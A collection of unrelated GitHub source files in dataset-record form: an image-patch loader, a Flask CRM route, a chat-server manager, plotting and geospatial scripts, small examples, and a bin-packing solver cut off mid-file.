> 0:\r\n train_blur_patch_input, train_blur_patch_rawout, train_blur_patch_rgbout = self.get_blur_patch()\r\n if num_salient_patch > 0:\r\n train_salient_patch_input, train_salient_patch_rawout, train_salient_patch_rgbout = self.get_salient_patch()\r\n if num_joint_patch > 0:\r\n train_joint_patch_input, train_joint_patch_rawout, train_joint_patch_rgbout = self.get_joint_patch()\r\n\r\n # Extract patches\r\n input_list = []\r\n rawout_list = []\r\n rgbout_list = []\r\n for i in range(num_train_img):\r\n h, w = train_img_input.shape[:2]\r\n 
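# NOTE (added): crop origins are floored to a multiple of 4 (min_divide), presumably so the crop stays aligned with the quad-Bayer color/exposure mosaic.\r\n            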
rand_h, rand_w = self.random_crop_start(h, w, self.opt.crop_size, 4)\r\n input_list.append(train_img_input[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size])\r\n rawout_list.append(train_img_rawout[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size])\r\n rgbout_list.append(train_img_rgbout[rand_h:rand_h+self.opt.crop_size, rand_w:rand_w+self.opt.crop_size, :])\r\n if num_blur_patch > 0:\r\n input_list.append(train_blur_patch_input)\r\n rawout_list.append(train_blur_patch_rawout)\r\n rgbout_list.append(train_blur_patch_rgbout)\r\n if num_salient_patch > 0:\r\n input_list.append(train_salient_patch_input)\r\n rawout_list.append(train_salient_patch_rawout)\r\n rgbout_list.append(train_salient_patch_rgbout)\r\n if num_joint_patch > 0:\r\n input_list.append(train_joint_patch_input)\r\n rawout_list.append(train_joint_patch_rawout)\r\n rgbout_list.append(train_joint_patch_rgbout)\r\n\r\n # Post-process images\r\n input_processed = []\r\n rawout_processed = []\r\n rgbout_processed = []\r\n edgeout_processed = []\r\n for id in range(len(input_list)):\r\n \r\n ### build input images list\r\n img = input_list[id]\r\n # Normalization\r\n img = img.astype(np.float) / 16383.0\r\n # Add noises\r\n for pos in self.short_pos:\r\n img[pos[0]::2, pos[1]::2] /= 4\r\n img = DA.add_noise_raw(img, self.opt.noise_K, self.opt.noise_sigma)\r\n for pos in self.short_pos:\r\n img[pos[0]::2, pos[1]::2] *= 4\r\n img = np.clip(img, 0, 1)\r\n # Add gamma correction\r\n img = img ** (1 / 2.2)\r\n # To tensor\r\n input_processed.append(torch.from_numpy(img).float().unsqueeze(0).contiguous())\r\n\r\n ### build rawout images list\r\n img = rawout_list[id]\r\n # Normalization\r\n img = img.astype(np.float) / 16383.0\r\n # Add gamma correction\r\n img = img ** (1 / 2.2)\r\n # To tensor\r\n rawout_processed.append(torch.from_numpy(img).float().unsqueeze(0).contiguous())\r\n\r\n ### build rgbout / edgeout images list\r\n img = rgbout_list[id]\r\n # Normalization\r\n edge = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n edge = DA.sobel(edge)\r\n edge = edge.astype(np.float) / 255.0\r\n img = img.astype(np.float) / 255.0\r\n # To tensor\r\n rgbout_processed.append(torch.from_numpy(img).float().permute(2, 0, 1).contiguous())\r\n edgeout_processed.append(torch.from_numpy(edge).float().unsqueeze(0).contiguous())\r\n \r\n # Concatenate\r\n for id2 in range(len(input_processed)):\r\n if id2 == 0:\r\n input_batch = input_processed[id2].unsqueeze(0)\r\n rawout_batch = rawout_processed[id2].unsqueeze(0)\r\n rgbout_batch = rgbout_processed[id2].unsqueeze(0)\r\n edgeout_batch = edgeout_processed[id2].unsqueeze(0)\r\n else:\r\n input_batch = torch.cat((input_batch, input_processed[id2].unsqueeze(0)), 0)\r\n rawout_batch = torch.cat((rawout_batch, rawout_processed[id2].unsqueeze(0)), 0)\r\n rgbout_batch = torch.cat((rgbout_batch, rgbout_processed[id2].unsqueeze(0)), 0)\r\n edgeout_batch = torch.cat((edgeout_batch, edgeout_processed[id2].unsqueeze(0)), 0)\r\n input_batch = input_batch.contiguous()\r\n rawout_batch = rawout_batch.contiguous()\r\n rgbout_batch = rgbout_batch.contiguous()\r\n edgeout_batch = edgeout_batch.contiguous()\r\n \r\n sample = {'input_batch': input_batch,\r\n 'rawout_batch': rawout_batch,\r\n 'rgbout_batch': rgbout_batch,\r\n 'edgeout_batch': edgeout_batch}\r\n\r\n return sample\r\n \r\n def __len__(self):\r\n return 10000\r\n\r\nclass QuadBayer2RGB_Valset(Dataset):\r\n def __init__(self, opt):\r\n self.opt = opt\r\n self.blur_imglist = []\r\n self.sharp_imglist = []\r\n self.save_imglist = 
[]\r\n\r\n        # Build validation dataset\r\n        imglist = get_heads_train(opt.baseroot_val)\r\n        for i in range(len(imglist)):\r\n            imgname = '%s%s_K%0.2f_sigma%0.1f.png' % (imglist[i], opt.ablation_data, opt.noise_K, opt.noise_sigma)\r\n            self.blur_imglist.append(os.path.join(opt.baseroot_val, imgname))\r\n            self.sharp_imglist.append(os.path.join(opt.baseroot_val, imglist[i] + '_rgb_gt.png'))\r\n            self.save_imglist.append(imgname)\r\n\r\n    def __getitem__(self, index):\r\n        \r\n        # Path of one image\r\n        blur_img_path = self.blur_imglist[index]\r\n        clean_img_path = self.sharp_imglist[index]\r\n        save_img_path = self.save_imglist[index]\r\n\r\n        in_img = cv2.imread(blur_img_path, -1)\r\n        RGBout_img = cv2.imread(clean_img_path, -1)\r\n\r\n        # Input images\r\n        in_img = in_img.astype(np.float) / 16383.0\r\n        in_img = in_img ** (1 / 2.2)\r\n        in_img = torch.from_numpy(in_img).float().unsqueeze(0).contiguous()\r\n\r\n        # Target images\r\n        RGBout_img = RGBout_img.astype(np.float) / 255.0\r\n        RGBout_img = torch.from_numpy(RGBout_img).float().permute(2, 0, 1).contiguous()\r\n\r\n        return in_img, RGBout_img, save_img_path\r\n    \r\n    def __len__(self):\r\n        return len(self.blur_imglist)\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    baseroot_test = 'F:\\\\QuadBayer Deblur\\\\data\\\\test\\\\test1'\r\n    imglist = get_raw_test(baseroot_test)\r\n    print(imglist)\r\n","repo_name":"zhaoyuzhi/QRNet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12551,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"}
{"seq_id":"71098985972","text":"from flask import Blueprint, render_template, request, make_response\nimport json\nimport pprint\nimport datetime\n\nfrom app.models import Lead, OfferV2, LeadComment, S3File, Order\n\nfrom ..utils import get_bitrix_auth_info\n\n\ndef register_routes(api: Blueprint):\n\n    @api.route(\"/salesportal/\", methods=[\"GET\", \"POST\"])\n    def salesportal():\n        from app.modules.importer.sources.bitrix24._association import find_association\n        from app.modules.importer.sources.bitrix24.lead import run_import\n        from app.modules.importer.sources.bitrix24.order import run_import as order_import\n\n        auth_info = get_bitrix_auth_info(request)\n        lead = None\n        if request.form.get(\"PLACEMENT\") == \"CRM_LEAD_DETAIL_TAB\":\n            lead_id = json.loads(request.form.get(\"PLACEMENT_OPTIONS\"))[\"ID\"]\n            lead_link = find_association(\"Lead\", remote_id=lead_id)\n            if lead_link is None:\n                run_import(remote_id=lead_id)\n                lead_link = find_association(\"Lead\", remote_id=lead_id)\n                if lead_link is None:\n                    return \"Lead not found\"\n            lead = Lead.query.filter(Lead.id == lead_link.local_id).first()\n            if lead is None:\n                return \"Lead not found2\"\n        if request.form.get(\"PLACEMENT\") == \"CRM_DEAL_DETAIL_TAB\":\n            order_id = json.loads(request.form.get(\"PLACEMENT_OPTIONS\"))[\"ID\"]\n            order_link = find_association(\"Order\", remote_id=order_id)\n            if order_link is None:\n                order_import(remote_id=order_id)\n                order_link = find_association(\"Order\", remote_id=order_id)\n                if order_link is None:\n                    return \"Order not found\"\n            order = Order.query.filter(Order.id == order_link.local_id).first()\n            lead = Lead.query.filter(Lead.customer_id == order.customer_id).first()\n            if lead is None:\n                return \"Order Lead not found\"\n        if lead is not None:\n            return render_template(\"salesportal/iframe.html\", lead=lead, auth_info=auth_info)\n        return \"No Placement\"\n\n    @api.route(\"/salesportal/install/\", methods=[\"POST\"])\n    def salesportal_installer():\n        return 
render_template(\"salesportal/install.html\")\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"app/modules/bitrix24/sections/salesportal.py","file_name":"salesportal.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862280694","text":"# Given an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\n# You must write an algorithm that runs in O(n) time.\n\n \n\n# Example 1:\n\n# Input: nums = [100,4,200,1,3,2]\n# Output: 4\n# Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.\n\n# Example 2:\n\n# Input: nums = [0,3,7,2,5,8,4,6,0,1]\n# Output: 9\n\n \n\n# Constraints:\n\n# 0 <= nums.length <= 105\n# -109 <= nums[i] <= 109\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n nums = set(nums)\n best = 0\n \n for num in nums:\n \n if (num -1) not in nums:\n y = num + 1\n while y in nums:\n y += 1\n best = max(best,y-num)\n return best\n\n# Time complexity is O(N)\n\n# Space complexity is O(N)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/Graph/longestConsecutiveSequence.py","file_name":"longestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30474399679","text":"from .. import messages\nfrom .. import logger\nfrom .. import config\nimport sys\nimport time\nimport select\nfrom .user import User\n\nclass Manager:\n def __init__(self, server_socket):\n self.users = []\n self.is_running = True\n self.admin = None\n self.muted_list = []\n self.server_socket = server_socket\n\n def wait(self):\n read_list, _, __ = select.select(self.users + [sys.stdin, self.server_socket], [], [])\n return read_list\n\n def add_user(self, user: User):\n if self.admin is None:\n self.admin = user\n self.users.append(user)\n self.announce(f'{user.name} joined the server.')\n\n def answer_client(self, client: User):\n # Controller function\n message = client.receive_message()\n\n if message is None:\n self.disconnect_client(client)\n\n data = messages.MessageData(message)\n\n if data.mtp == 'SendChat':\n if client not in self.muted_list:\n self.send_chat_from_user(client, data.message)\n else:\n client.send_message(messages.ServerMessage('You are muted.'))\n\n elif data.mtp == 'Disconnect':\n self.disconnect_client(client)\n\n elif data.mtp == 'SetUsername':\n self.set_username(client, data.name)\n\n elif data.mtp == 'RequestUserInfo':\n found_user = False\n for user in self.users:\n if user.name == data.name:\n client.send_message(messages.ProvideUserInfo(user))\n found_user = True\n if not found_user:\n client.send_message(messages.ProvideUserInfo(None, status='UserDoesNotExist'))\n\n elif data.mtp == 'RequestLocalTime':\n client.send_message(messages.SendLocalTime())\n\n elif data.mtp == 'WhisperToUser':\n if client not in self.muted_list:\n for user in self.users:\n if user.name in data.to_users:\n user.send_message(messages.WhisperFromUser(client.name, data.message))\n else:\n client.send_message(messages.ServerMessage('You are muted.'))\n\n elif data.mtp == 'RequestOnlineList':\n client.send_message(messages.SendOnlineList([user.name for user in self.users]))\n\n elif data.mtp == 'KickUser':\n if client is self.admin:\n found_user = False\n for user in self.users:\n if user.name in data.name:\n 
client.send_message(messages.KickUser(status='OK'))\n                        self.disconnect_client(user, 'Kicked from the server.')\n                        self.announce(f'{user.name} has been kicked from the server.')\n                        found_user = True\n                \n                if not found_user:\n                    client.send_message(messages.KickUser(status='UserDoesNotExist'))\n            else:\n                client.send_message(messages.KickUser(status='NotAdminError'))\n\n        elif data.mtp == 'MuteUser':\n            if client is self.admin:\n                found_user = False\n                for user in self.users:\n                    if user.name in data.name:\n                        if user not in self.muted_list:\n                            self.muted_list.append(user)\n                            self.announce(f'{user.name} has been muted.')\n                            client.send_message(messages.MuteUser(status='OK'))\n                        else:\n                            client.send_message(messages.MuteUser(status=\"UserAlreadyMuted\"))\n                        found_user = True\n                \n                if not found_user:\n                    client.send_message(messages.MuteUser(status='UserDoesNotExist'))\n            else:\n                client.send_message(messages.MuteUser(status='NotAdminError'))\n\n        elif data.mtp == 'UnmuteUser':\n            if client is self.admin:\n                found_user = False\n                for user in self.users:\n                    if user.name in data.name:\n                        if user in self.muted_list:\n                            self.muted_list.remove(user)\n                            self.announce(f'{user.name} has been unmuted.')\n                            client.send_message(messages.UnmuteUser(status='OK'))\n                        else:\n                            # handle the case where the user was not muted in the first place\n                            client.send_message(messages.UnmuteUser(status=\"UserNotMuted\"))\n                        found_user = True\n                \n                if not found_user:\n                    client.send_message(messages.UnmuteUser(status='UserDoesNotExist'))\n            else:\n                client.send_message(messages.UnmuteUser(status='NotAdminError'))\n\n        elif data.mtp == 'SetAsAdmin':\n            if client is self.admin:\n                found_user = False\n                for user in self.users:\n                    if user.name in data.name:\n                        if user is client:\n                            client.send_message(messages.SetAsAdmin(status='AlreadyAdmin'))\n                        else:\n                            self.admin = user\n                            self.announce(f'{user.name} is now the admin.')\n                            client.send_message(messages.SetAsAdmin(status='OK'))\n                        found_user = True\n                \n                if not found_user:\n                    client.send_message(messages.SetAsAdmin(status='UserDoesNotExist'))\n            else:\n                client.send_message(messages.SetAsAdmin(status='NotAdminError'))\n\n        else:\n            logger.error('Unsupported message type received!')\n\n    def send_chat_from_user(self, from_user, message):\n        for to_user in self.users:\n            if from_user is not to_user:\n                to_user.send_message(messages.SendChatFromUser(from_user.name, message))\n        logger.chat(f'{from_user.name}: {message}')\n\n    def disconnect_client(self, outgoing_client: User, reason=''):\n        if outgoing_client is self.admin:\n            found_user = False\n            for user in self.users:\n                if user is not outgoing_client:\n                    self.admin = user\n                    found_user = True\n                    break\n            if found_user:\n                self.announce(f'{self.admin.name} is now the admin.')\n            else:\n                self.admin = None\n\n        if outgoing_client in self.muted_list:\n            self.muted_list.remove(outgoing_client)\n\n        if outgoing_client.is_connected:\n            outgoing_client.send_message(messages.Disconnect(reason))\n            logger.debug(f'Disconnected {outgoing_client}')\n        else:\n            logger.warning(f'Client ({outgoing_client}) disconnected unexpectedly.')\n\n        self.users.remove(outgoing_client)\n        if not reason:\n            self.announce(f'{outgoing_client.name} left the server.')\n\n        outgoing_client.close()\n\n    def announce(self, server_message):\n        for user in self.users:\n            user.send_message(messages.ServerMessage(server_message))\n        logger.info(server_message)\n\n    def handshake(self, client: User):\n        request = client.receive_message()\n\n        if request['mtp'] != 'Login':\n            logger.error(f'MTP Mismatch! Expected: Login. 
Got: {request[\"mtp\"]}')\n return False\n else:\n requested_name = request['data']['name']\n\n if self.check_name(requested_name):\n logger.error(f'Client requested name already exists! Disconnecting.')\n client.send_message(messages.AssignUsername(requested_name, status='DuplicateError'))\n return False\n\n else:\n client.send_message(messages.AssignUsername(requested_name))\n client.set_name(requested_name)\n return True\n\n def set_username(self, user, new_name):\n if self.check_name(new_name):\n logger.error(f'Requested name already exists!')\n user.send_message(messages.SetUsername(user.name, 'DuplicateError'))\n\n else:\n self.announce(f'{user.name} has changed username to {new_name}.')\n user.name = new_name\n user.send_message(messages.SetUsername(user.name))\n\n\n def shutdown(self):\n logger.info('Disconnecting all clients.')\n for user in self.users:\n self.disconnect_client(user, \"Server is shutting down.\")\n logger.info('Disconnected all clients. Server now shutting down.')\n self.is_running = False\n\n def check_name(self, name):\n for user in self.users:\n if name == user.name:\n return True\n return False\n\n def purge_clients(self):\n # Supposedly kick all clients that have not responded to a keepAlive packet\n pass","repo_name":"digitalsirkeith/coe151personal","sub_path":"library/server/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34969430205","text":"from load_data import load_DBs\nfrom plot_functions import plot_all\nfrom plot_types import TypePlotter\nfrom laplace_tests import calc_laplace as claplace\n\nclass Mydata:\n def __init__(self, load):\n if load:\n (self.dsatable, self.src2dsa, self.dsa2cve, self.cvetable, self.src2month, self.src2sloccount, self.src2pop, self.src2deps, self.pkg_with_cvss, self.src2cwe) = load_DBs()\n else:\n print('no load command given')\n\ndef main():\n data = Mydata(True)\n print('Done')\n i = plot_all(data.src2month, data.src2sloccount, data.pkg_with_cvss)\n #\n years = 19\n # 2000-2018\n \n j = TypePlotter(data, years)\n j.plot_types()\n\n sum_linux = 0\n for num in data.src2month['linux'][:-12]:\n sum_linux += num\n print(sum_linux)\n\n #l = claplace(data,years)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nikalexo/DVAF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37908039829","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 29 16:57:44 2021\r\n\r\n@author: cuch9001\r\n\"\"\"\r\n\r\nimport geopandas as gpd\r\nfrom xyconvert import wgs2gcj\r\nimport numpy as np\r\nfrom shapely.geometry import mapping, shape, MultiPolygon\r\n\r\ndef coord_trans(geom):\r\n if geom.geom_type == 'MultiPolygon':\r\n return MultiPolygon([coord_trans(i) for i in geom.geoms])\r\n if geom.geom_type == 'Polygon':\r\n geojson = mapping(geom)\r\n geojson['coordinates'] = tuple([tuple(map(tuple, wgs2gcj(np.array(geojson['coordinates'][0])))),])\r\n return shape(geojson)\r\n\r\ntest = gpd.read_file('C:/Users/cuch9001/Desktop/行政边界/C11_3_region_GCJ02.shp').to_crs('epsg:4030')\r\n\r\ntest1 = test.copy()\r\n\r\ntest1['geometry'] = test1['geometry'].apply(lambda x: 
coord_trans(x))\r\n\r\nmapping(test['geometry'][66])['coordinates'][0][0][0]\r\nmapping(test1['geometry'][66])['coordinates'][0][0][0]\r\n","repo_name":"choeycui/func_record","sub_path":"coord_convert.py","file_name":"coord_convert.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38175622287","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag()\ndef lista_de_zonas(tecnologia):\n zonas = \"\"\n for localidad in tecnologia.localidades.all():\n zona = localidad.get_zona_display()\n if len(zonas) == 0:\n zonas = zona\n elif zona not in zonas:\n zonas += \", {0}\".format(zona)\n return zonas\n\n\n@register.simple_tag()\ndef lista_de_territorios(tecnologia):\n territorios = \"\"\n for localidad in tecnologia.localidades.all():\n territorio = localidad.get_territorio_display()\n if len(territorios) == 0:\n territorios = territorio\n elif territorio not in territorios:\n territorios += \", {0}\".format(territorio)\n return territorios\n","repo_name":"numiescl/catalogo_tecnologias_locales","sub_path":"catalogo/templatetags/catalogo_tags.py","file_name":"catalogo_tags.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14459769821","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport galsim\n\nimport _mypath\nimport chroma\n\ndef loadcat():\n return np.load('indata/opsim.npy')\n\ndef lensing_visits(cat):\n r_cond = cat['filter'] == 'r'\n i_cond = cat['filter'] == 'i'\n X_cond = cat['airmass'] < 1.5\n return (r_cond | i_cond) & X_cond\n\ndef plot_field(cat, field, filter_name, align_SED_file, target_SED_file, target_z, ax,\n label, **kwargs):\n wobj = (cat['fieldID'] == field) & (cat['filter'] == filter_name)\n\n data_dir = '../../data/'\n filter_dir = data_dir+'filters/'\n SED_dir = data_dir+'SEDs/'\n align_SED = galsim.SED(SED_dir+align_SED_file)\n target_SED = galsim.SED(SED_dir+target_SED_file)\n bandpass = galsim.Bandpass(filter_dir+\"LSST_{}.dat\".format(filter_name))\n\n align_moments = align_SED.calculateDCRMomentShifts(bandpass,\n zenith_angle = np.pi/4.0 * galsim.radians)\n target_moments = target_SED.calculateDCRMomentShifts(bandpass,\n zenith_angle = np.pi/4.0 * galsim.radians)\n\n # milliarcseconds\n delta_R = (target_moments[0][1,0] - align_moments[0][1,0]) * 180./np.pi * 3600 * 1000\n # square arcseconds\n delta_V = (target_moments[1][1,1] - align_moments[1][1,1]) * (180./np.pi * 3600)**2\n\n rsquared = 0.4**2 # square arcseconds\n m = delta_V * np.tan(cat[wobj]['z_a'])**2 / rsquared\n\n r = delta_R * np.tan(cat[wobj]['z_a'])\n q = cat[wobj]['q']\n\n x0 = r * np.sin(q)\n y0 = r * np.cos(q)\n x1 = (r + m*2000) * np.sin(q)\n y1 = (r + m*2000) * np.cos(q)\n for i, (x00, x11, y00, y11) in enumerate(zip(x0, x1, y0, y1)):\n if i == 0:\n ax.plot([x00, x11], [y00, y11], label=label, **kwargs)\n else:\n ax.plot([x00, x11], [y00, y11], **kwargs)\n ax.plot([-80, -80 + 2000*0.01], [80, 80], color='black')\n ax.text(-82, 83, 'm=0.01', size=14)\n\nif __name__ == '__main__':\n\n fig = plt.figure(figsize=(5.5,5))\n ax = fig.add_subplot(111)\n ax.set_xlim(-100, 100)\n ax.set_ylim(-100, 100)\n ax.set_xlabel('$\\Delta$ RA (mas)', fontsize=18)\n ax.set_ylabel('$\\Delta$ DEC (mas)', fontsize=18)\n ax.scatter([0], [0], s=150, marker='+', color='black', linewidth=2.5)\n ax.grid()\n\n cat = loadcat()\n 
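# NOTE (added): keep only the r/i-band visits at airmass < 1.5 (the cut defined in lensing_visits above).\n    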
cat = cat[lensing_visits(cat)]\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'KIN_Sa_ext.ascii', 1.2, ax,\n label='Sa gal', color='blue')\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'ukm5v.ascii', 1.2, ax,\n label='M5v star', color='magenta')\n plot_field(cat, 598, 'r', 'ukg5v.ascii', 'CWW_E_ext.ascii', 1.2, ax,\n label='E gal', color='red')\n\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'KIN_Sa_ext.ascii', 1.2, ax,\n label='_no_legend_', color='blue', alpha=0.5)\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'ukm5v.ascii', 1.2, ax,\n label='_no_legend_', color='magenta', alpha=0.5)\n plot_field(cat, 2036, 'r', 'ukg5v.ascii', 'CWW_E_ext.ascii', 1.2, ax,\n label='_no_legend_', color='red', alpha=0.5)\n ax.legend(fontsize=14)\n ax.tick_params(axis='both', which='major', labelsize=18)\n fig.tight_layout()\n #plt.show()\n import os\n if not os.path.isdir('output/'):\n os.mkdir('output/')\n plt.savefig('output/relative_alignment.png', dpi=220)\n","repo_name":"LSSTDESC/chroma","sub_path":"bin/opsim/relative_alignment.py","file_name":"relative_alignment.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"41194326834","text":"import os\nimport pathlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport tensorflow_probability as tfp\n\n\ndef save2Vis(figname):\n \"\"\" a shortcut function to save plot to visualization dir \n\n Note\n ----\n\n We simply assume that every repo will have a 'visulizations' \n dir under the root directory\n \"\"\"\n\n axe = plt.gca()\n plt.savefig(f'visualization/{figname}.pdf',\n format='pdf', dpi=300, bbox_inches='tight')\n\n\ndef save_a_plot(fname, save_dir):\n plt.gcf()\n plt.savefig(fname=os.path.join(save_dir, fname),\n dpi=300,\n format='pdf',\n bbox_inches='tight')\n plt.close()\n\n\ndef cd_root_dir():\n # change directory to the path of the root directory of the project\n\n ref_path = os.path.abspath('')\n ref_path = pathlib.Path(ref_path).resolve().parents[1]\n os.chdir(ref_path)\n print(\"current directory:\", os.getcwd())\n\n\ndef sin_transformer(period, x):\n return np.sin(x * 2 * np.pi * (1 / period))\n\n\ndef cos_transformer(period, x):\n return np.cos(x * 2 * np.pi * (1 / period))\n\n\ndef pl_residual(gt, preds, low=2, limit=4):\n \"\"\" residual plots of deterministic models \"\"\"\n\n fig, ax = plt.subplots()\n ax.scatter(preds, gt, color='blue', alpha=0.2)\n\n # diagonal line\n ax.plot(np.arange(low, limit, 0.01), np.arange(\n low, limit, 0.01), color='gray', ls='--')\n\n ax.set_xlabel('Predicted revenue in million')\n ax.set_ylabel('Ground truth revenue in million')\n ax.set_title('Ground truth v.s. Predicted revenue')\n\n\ndef pl_residual_horizontal(gt, preds, low=2, limit=4):\n \"\"\" residual plots of deterministic models \"\"\"\n\n fig, ax = plt.subplots()\n residual = gt - np.squeeze(preds)\n ax.scatter(preds, residual, color='blue', alpha=0.2)\n hl = np.arange(low, limit, 0.01)\n # horizontal line\n ax.plot(hl, np.zeros(shape=(len(hl),)), color='gray', ls='--')\n ax.set_xlabel('Predicted revenue in million')\n ax.set_ylabel('Residual (ground truth - predicted) in million')\n ax.set_title('Residuals v.s. 
Predicted revenue')\n\n\n\ndef pl_residual_hist(gt, preds,):\n \"\"\" Plot the frequency-dependent residuals\n\n Parameters\n ----------\n freq_indexx : int, [0,33);\n the index of a frequency axis\n \"\"\"\n\n fig, axe = plt.subplots()\n residual = gt - np.squeeze(preds)\n\n # histogram\n axe = sns.histplot(data=residual, bins=10, binrange=(-1, 1), kde=False, stat='density')\n \n # KDE plot\n # sns.kdeplot(data=data_per_freq, color='crimson', ax=axe)\n\n mean = np.mean(residual)\n sigma = np.std(residual)\n\n # fitted Gaussian with MLE paramters\n N = tfp.distributions.Normal(loc=mean, scale=sigma)\n x_axis = np.linspace(-1, 1, 100)\n pdf = N.prob(x_axis)\n\n axe.plot(x_axis, pdf, color='crimson', linestyle='--')\n # adding such infor in the plot but very hard to control the location dynamically\n # axe.text(0.8, 1., f\"mu={mean:.2f}\")\n # axe.text(0.8, 1.2, f\"std={sigma:.2f}\")\n\n axe.set_xlabel('Residual')\n axe.set_title('Residual distribution (training set)')","repo_name":"leslieDLcy/KTP_Croud","sub_path":"src/modelling/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41260985127","text":"#!/usr/bin/python3\n\n'''\nThis example shows how to shuffle a list in python\n'''\n\nimport random # for seed, shuffle\n# for deterministic behaviour\nrandom.seed(7)\nl = list(range(1, 10))\nrandom.shuffle(l)\nprint(l)\n","repo_name":"nonZero/demos-python","sub_path":"src/examples/short/random/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21178332826","text":"\r\nfrom gurobipy import *\r\n\r\ndef threestep(name):\r\n import numpy as np\r\n from readdata import data\r\n import math\r\n\r\n data = data(name)\r\n\r\n w = data[1]\r\n c = data[2]\r\n C = data[0]\r\n N = len(w)\r\n UB = data[3]\r\n\r\n data = []\r\n for j in range(len(w)):\r\n data.append([j,c[j],w[j]])\r\n\r\n\r\n Colors = []\r\n for i in c:\r\n if i not in Colors:\r\n Colors.append(i)\r\n\r\n colj = []\r\n for i in Colors:\r\n colr = []\r\n for j in data:\r\n if i == j[1]:\r\n colr.append(j[0])\r\n colj.append(colr)\r\n\r\n\r\n Lc1 = []\r\n for i in Colors:\r\n v = 0\r\n for j in data:\r\n if j[1] == i:\r\n v += j[2]\r\n Lc1.append(math.ceil(v/C))\r\n\r\n Ic1 = []\r\n for i in Colors:\r\n c1 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if j[2] > C-k:\r\n c1.append(j[0])\r\n break \r\n Ic1.append(c1)\r\n\r\n Ic2 = []\r\n for i in Colors:\r\n c2 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if C-k >= j[2] and j[2] > C/2 :\r\n c2.append(j[0])\r\n if j[0] in Ic1:\r\n print(\"stoooppp\")\r\n break\r\n \r\n Ic2.append(c2)\r\n\r\n Ic3 = []\r\n for i in Colors:\r\n c3 = []\r\n for j in data:\r\n if j[1] == i:\r\n for k in range(C//2):\r\n if C/2 >= j[2] and j[2] >= k :\r\n c3.append(j[0])\r\n if j[0] in Ic1 or j[0] in Ic2:\r\n print(\"stoooppp\")\r\n break \r\n Ic3.append(c3)\r\n\r\n Lc2 = []\r\n for i in range(len(Colors)):\r\n lc2 = 0\r\n a = 0\r\n for j in Ic3[i]:\r\n\r\n a += data[j][2]/C\r\n b = 0 \r\n for k in Ic2[i]:\r\n b += data[j][2]/C\r\n if math.ceil(a-len(Ic2[i])+b)>0:\r\n lc2 += math.ceil(a-len(Ic2[i])+b)\r\n lc2 += len(Ic1[i])+len(Ic2[i])\r\n Lc2.append(lc2)\r\n\r\n Lc = []\r\n for i in range(len(Colors)):\r\n Lc.append(max(Lc1[i],Lc2[i]))\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n M = 
